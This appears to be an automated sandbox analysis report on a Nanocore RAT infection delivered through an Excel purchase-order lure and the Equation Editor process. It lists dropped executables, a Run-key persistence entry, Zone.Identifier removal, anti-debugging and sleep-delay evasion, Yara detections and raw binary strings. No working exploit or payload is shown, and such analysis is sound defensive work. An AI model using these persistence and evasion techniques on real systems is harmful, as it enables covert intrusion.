Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	File created: C:\Users\user\AppData\Local\Temp\nsu1B8.tmp\System.dll	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Users\Public\vbc.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ppeejliapu			Jump to behavior
Source: C:\Users\Public\vbc.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ppeejliapu			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\Public\vbc.exe

File opened: C:\Users\Public\vbc.exe:Zone.Identifier read attributes | delete

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Process information set: NOOPENFILEERRORBOX

Source: Purchase Order Price List 061021.xlsx

Stream path 'EncryptedPackage' entropy: 7.99980864717 (max. 8.0)

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\Public\vbc.exe	Window / User API: threadDelayed 356
Source: C:\Users\Public\vbc.exe	Window / User API: foregroundWindowGot 385

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2524	Thread sleep time: -240000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 1296	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2936	Thread sleep time: -36000s >= -30000s
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe TID: 2172	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe TID: 2088	Thread sleep count: 43 > 30
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe TID: 1688	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00405E61 FindFirstFileA,FindClose,
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040263E FindFirstFileA,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00404A29 FindFirstFileExW,
Source: C:\Users\Public\vbc.exe	Code function: 5_1_00404A29 FindFirstFileExW,
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Code function: 7_2_00404A29 FindFirstFileExW,
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Code function: 7_1_00404A29 FindFirstFileExW,

Source: C:\Users\Public\vbc.exe

Code function: 5_2_005C0E1E GetSystemInfo,

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Thread delayed: delay time: 922337203685477

Source: opjlpsercy.exe, 00000008.00000002.2354735935.0000000000284000.00000004.00000020.sdmp

Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Source: C:\Users\Public\vbc.exe

Code function: 5_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,

Source: C:\Users\Public\vbc.exe	Code function: 5_2_004035F1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe	Code function: 5_1_004035F1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Code function: 7_2_004035F1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Code function: 7_1_004035F1 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\Public\vbc.exe

Code function: 5_2_004067FE GetProcessHeap,

Source: C:\Users\Public\vbc.exe

Process token adjusted: Debug

Source: C:\Users\Public\vbc.exe	Code function: 5_2_00401E1D SetUnhandledExceptionFilter,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\Public\vbc.exe	Code function: 5_1_00401E1D SetUnhandledExceptionFilter,
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\Public\vbc.exe	Code function: 5_1_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\Public\vbc.exe	Code function: 5_1_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Code function: 7_2_00401E1D SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Code function: 7_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Code function: 7_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Code function: 7_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Code function: 7_1_00401E1D SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Code function: 7_1_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Code function: 7_1_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Code function: 7_1_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

Source: C:\Users\Public\vbc.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Users\Public\vbc.exe protection: execute and read and write
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Section loaded: unknown target: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe protection: execute and read and write

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Process created: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe 'C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe'

Source: vbc.exe, 00000005.00000002.2356271647.0000000002386000.00000004.00000001.sdmp	Binary or memory string: Program ManagerH
Source: vbc.exe, 00000005.00000002.2356455258.0000000002496000.00000004.00000001.sdmp	Binary or memory string: Program Manager
Source: vbc.exe, 00000005.00000002.2355421754.00000000009F0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000005.00000002.2356403112.000000000244C000.00000004.00000001.sdmp	Binary or memory string: Program Manager,
Source: vbc.exe, 00000005.00000002.2355421754.00000000009F0000.00000002.00000001.sdmp	Binary or memory string: !Progman
Source: vbc.exe, 00000005.00000002.2355325455.0000000000654000.00000004.00000020.sdmp	Binary or memory string: Program Managerknown.
Source: vbc.exe, 00000005.00000002.2356271647.0000000002386000.00000004.00000001.sdmp	Binary or memory string: Program Manager`
Source: vbc.exe, 00000005.00000002.2356271647.0000000002386000.00000004.00000001.sdmp	Binary or memory string: Program Manager<

Source: C:\Users\Public\vbc.exe

Code function: 5_2_0040208D cpuid

Source: C:\Users\Public\vbc.exe

Code function: 5_2_00401B74 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000005.00000002.2357227032.00000000044C2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2194726397.0000000001C80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000001.2192160089.0000000000414000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2357038377.00000000043A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2206463442.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2360021301.0000000005620000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.2155256046.0000000000414000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2207202360.0000000003171000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2157666765.0000000001DA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2208042866.0000000004432000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2207350789.00000000031FC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2355089407.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2356006744.0000000002201000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2207760336.0000000004310000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2357138327.0000000004430000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2207916460.00000000043A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2356794986.00000000033AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: opjlpsercy.exe PID: 2248, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2808, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2364, type: MEMORY
Source: Yara match	File source: Process Memory Space: opjlpsercy.exe PID: 2236, type: MEMORY
Source: Yara match	File source: 4.2.vbc.exe.1da0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.5620000.25.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.1.opjlpsercy.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.415058.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.opjlpsercy.exe.1c91458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.4430000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.5624629.26.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.1.opjlpsercy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.opjlpsercy.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.opjlpsercy.exe.1c91458.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.opjlpsercy.exe.1c80000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.1db1458.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.opjlpsercy.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.4430000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.opjlpsercy.exe.3173258.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.opjlpsercy.exe.1c80000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.opjlpsercy.exe.3346174.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.opjlpsercy.exe.43a0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.opjlpsercy.exe.43a0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.33c5116.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.opjlpsercy.exe.3335116.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.33c9f42.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.44c0000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.415058.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.1.opjlpsercy.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.1da0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.5620000.25.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.1db1458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.opjlpsercy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.opjlpsercy.exe.3339f42.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.opjlpsercy.exe.4430000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.opjlpsercy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.opjlpsercy.exe.3173258.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.33d6174.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Detected Nanocore Rat

Show sources

Source: vbc.exe, 00000004.00000002.2157666765.0000000001DA0000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: vbc.exe	String found in binary or memory: NanoCore.ClientPluginHost
Source: vbc.exe, 00000005.00000002.2359891154.00000000055B0000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetT